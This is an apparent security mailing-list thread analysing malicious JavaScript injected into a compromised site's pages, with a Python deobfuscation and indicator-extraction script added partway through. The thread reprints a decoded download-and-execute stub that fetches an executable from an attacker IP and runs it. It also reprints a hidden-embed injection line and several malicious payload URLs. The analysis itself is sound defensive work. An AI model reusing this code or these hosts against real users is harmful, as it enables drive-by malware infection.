RE: Malicious code just found on web server

FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- - ferg

Yes, definitely malicious:

http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b

- - ferg

You beat me to it.

-ChrisAM

Nice, the bad code is actually on all of the error (404) pages for the site as
well as some other PHP pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decoded, the code attempts multiple attacks to try and get the victim to
download an executable:

   hxxp://77.92.158.122/webmail/inc/web/load.php

Virustotal results (3/40)
http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3

Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.

(I commented out each line just in case someone has a browser that will try
and render this.)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null, "Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var file=C.classes['@mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile); file.initWithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return C.classes['@mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess); }")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){ io=C.classes['@mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService); source=io.newURI('http://77.92.158.122/webmail/inc/web/load.php','UTF8',null); persist=C.classes['@mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createInstance(C.interfaces.nsIWebBrowserPersist); persist.persistFlags=8192|4096; persist.saveURI(source,null,null,null,null,file); return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) { process.init(file); process.run(false,[],0); }")();

It also attempts to download a hostile PDF file from a subdirectory underneath
this one, which was created with a demo copy of Foxit.
    hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO:
Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code. I can upload or
update this thread if you are interested in the other attacks.

Jake
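As an added example, not code from this thread, from the list members, or from the compromised site: a small Python triage script that does statically what Jake describes above (peel the base64 layer) and then pulls the indicators out of the decoded payload the way ChrisAM did with the document.write/embed, without ever rendering or eval'ing anything. The sample page is constructed: the eval(atob(...)) wrapper is an assumption about how the base64 was wired in, and the inner payload reuses only the URLs and XPCOM/-moz-binding strings quoted in this thread.

```python
import base64
import binascii
import re
from typing import List, Optional

# Constructed sample, not taken from the compromised site: an eval(atob(...))
# wrapper (assumed) around a payload that mirrors what the thread describes,
# i.e. the hidden <embed> written by document.write plus the -moz-binding /
# XPCOM download-and-execute stub. Only the indicator strings are from the thread.
INNER_PAYLOAD = r"""
document.write("<embed src=\"http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
var el = document.createElement("div");
el.setAttribute("style", "display: none; -moz-binding: url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
var file = C.classes['@mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile);
source = io.newURI('http://77.92.158.122/webmail/inc/web/load.php', 'UTF8', null);
"""

SAMPLE_PAGE = (
    '<html><body><script>eval(atob("'
    + base64.b64encode(INNER_PAYLOAD.encode()).decode()
    + '"));</script>\n'
    '<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>\n'
    "</body></html>"
)

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s\"'<>\\]+")
# src may be written as src=\"...\" inside a document.write string literal
EMBED_SRC_RE = re.compile(r"<embed[^>]*?src=\\?[\"']([^\"'\\]+)", re.IGNORECASE)
INDICATORS = (
    "document.write", "<embed", "-moz-binding", "chrome://",
    "nsILocalFile", "nsIProcess", "nsIWebBrowserPersist", "Components",
)


def _looks_like_text(data: bytes) -> Optional[str]:
    """Return the decoded text if the bytes are (almost entirely) printable."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not text:
        return None
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return text if printable / len(text) > 0.95 else None


def decode_layers(text: str, max_depth: int = 5) -> List[str]:
    """Peel base64 layers statically: nothing is eval'ed, we only decode long
    base64 runs that turn into text and recurse into the result."""
    layers = [text]
    frontier = [text]
    for _ in range(max_depth):
        next_frontier = []
        for layer in frontier:
            for match in BASE64_RUN.finditer(layer):
                blob = match.group(0)
                if len(blob) % 4:
                    continue
                try:
                    raw = base64.b64decode(blob, validate=True)
                except (ValueError, binascii.Error):
                    continue
                decoded = _looks_like_text(raw)
                if decoded and decoded not in layers:
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def defang(url: str) -> str:
    """Make a URL safe to paste into a report (http -> hxxp)."""
    return re.sub(r"^http", "hxxp", url)


def triage(page: str) -> dict:
    """Decode the page's obfuscation layers and pull out IOCs without rendering."""
    layers = decode_layers(page)
    urls, embed_src, indicators = set(), set(), set()
    for layer in layers:
        urls.update(defang(u) for u in URL_RE.findall(layer))
        embed_src.update(EMBED_SRC_RE.findall(layer))
        indicators.update(i for i in INDICATORS if i in layer)
    return {
        "layers": len(layers),
        "urls": sorted(urls),
        "embed_src": sorted(embed_src),
        "indicators": sorted(indicators),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```

The point of decoding rather than running the script is that the XPCOM stub only does damage when it executes with chrome privileges in the browser; a regex pass over the decoded text gets you the same URLs and the nsILocalFile/nsIProcess/nsIWebBrowserPersist tells for a block list without that risk. Feed it the raw HTML of the 404 page and the PHP pages Jake mentions; the defanged URLs are what you would paste into the thread.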

Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:

hxxp://test1.ru/1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of
crimeware.

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

Paul,
I noticed that in the PDF file, but as the domain doesn't seem to resolve I
didn't mention it.

Jake

WHOIS information on the domain

Whois Record

domain: TEST1.RU
type: CORPORATE
nserver: ns1.centerhost.ru.
nserver: ns1.cetis.ru.
state: REGISTERED, DELEGATED
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN

Registry Data
  Created: 2001-03-30
  Expires: 2010-04-03
  Whois Server: whois.ripn.net

Server Data
  Domain Status: Registered And No Website